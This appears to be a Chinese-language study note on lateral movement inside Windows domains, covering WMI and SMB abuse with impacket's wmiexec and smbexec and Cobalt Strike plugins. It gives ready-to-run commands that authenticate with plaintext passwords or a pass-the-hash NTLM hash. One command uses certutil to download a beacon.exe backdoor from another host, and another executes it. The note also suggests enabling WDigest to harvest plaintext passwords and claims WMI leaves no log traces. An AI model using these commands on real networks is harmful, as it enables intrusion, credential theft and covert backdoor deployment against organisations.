学习的目的
windows 2012以上默认关闭了Wdigest,所以攻击者无法通过内存获取到明文密码
为了针对以上情况 所以有四种方法解决:
1.利用(PTH,PTK)等进行移动不需要明文
2.利用其他服务协议(SMB/WMI等进行哈希移动)
3.利用注册表开启(wdigest auth)进行获取、
4.利用工具或者第三方平台(HASHCAT进行破解获取)
WMI
WMI全称"windows管理规范",从win2003开始一直存在。它原本的作用是方便管理员对windows主机进行管理。因此在内网渗透中,我们可以使用WMI进行横向移动,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。
利用条件:
1、WMI服务开启,端口135,默认开启。
2、防火墙允许135、445等端口通信。
3、知道目标机的账户密码或HASH。
wmi横向移动的使用:wmiexec-impacket (主要使用方法)
python wmiexec.py sqlserver/administrator:admin!@#45@192.168.3.32
python wmiexec.py sqlserver/administrator:admin!@#45@192.168.3.32 "whoami"
python wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c sqlserver/administrator@192.168.3.32 "whoami"
下载后门:
python wmiexec.py sqlserver/administrator:admin!@#45@192.168.3.32 "certutil -urlcache -split -f http://192.168.3.31/beacon.exe c:/beacon.exe"
执行后门:
python wmiexec.py sqlserver/administrator:admin!@#45@192.168.3.32 "c:/beacon.exe"
通过wmic 进行后门上线,这边的主机名和用户名是通过前期的信息收集收集而来的
SMB服务
SMB服务通常由文件服务器提供,它允许客户端计算机通过网络访问服务器上的共享资源。通过SMB用户可以在网络上访问和共享文件夹、文件以及打印机,从而实现在不同计算机之间方便地共享数据和打印输出。利用SMB可通过明文或HASH传递来远程执行。
利用条件:
1、文件与打印机服务开启,默认开启。
2、防火墙允许135、445等端口通信。
3、知道目标机的账户密码或HASH。
利用方法
法一,smbexec-impacket
外部:(交互式)
python smbexec.py sqlserver/administrator:admin!@#45@192.168.3.32
python smbexec.py -hashes :518b98ad4178a53695dc997aa02d455c sqlserver/administrator@192.168.3.32
法二4.CS插件:
cs-psexec
SMB横向移动:
推荐使用impacket和CS插件
IIS服务器的目录 c:\inetpub\wwwroot
通过wmic 进行后门上线,这边的主机名和用户名是通过前期的信息收集收集而来的
有可以直接进行交互式的工具以及CS的插件cscript(不建议使用)
SMB横向移动:
推荐使用impacket和CS插件
dcom是通过powershell进行利用的,只有windows7(windows server8)以后的版本才有powershell,并且需要关闭防火墙,比较鸡肋。
实战当中,要去分析防火墙限制了什么协议,然后再来选择通过上面方式进行横向移动
像SMB这种就需要开放文件和打印机共享,怎么判断限制了什么协议,就可以直接使用impacket里面的代码进行攻击,成功的话就是可以
电脑是默认打开文件和打印机共享的,所以正常是可以使用SMB进行横向移动的
主要注意几个点:
(1)使用命令攻击时计算机名需要写入,分清域内用户和域外用户
(2)wmi,smb,dcom三个横向手法所需要的条件,并且要学会什么时候使用什么协议进行攻击,也就是用impacket进行探测,探测成功后进行使用
(3)掌握明文和非明文(hash)的攻击方法
(4)掌握计算机名的信息收集,主要是通过spn收集,systeminfo,net view /domain
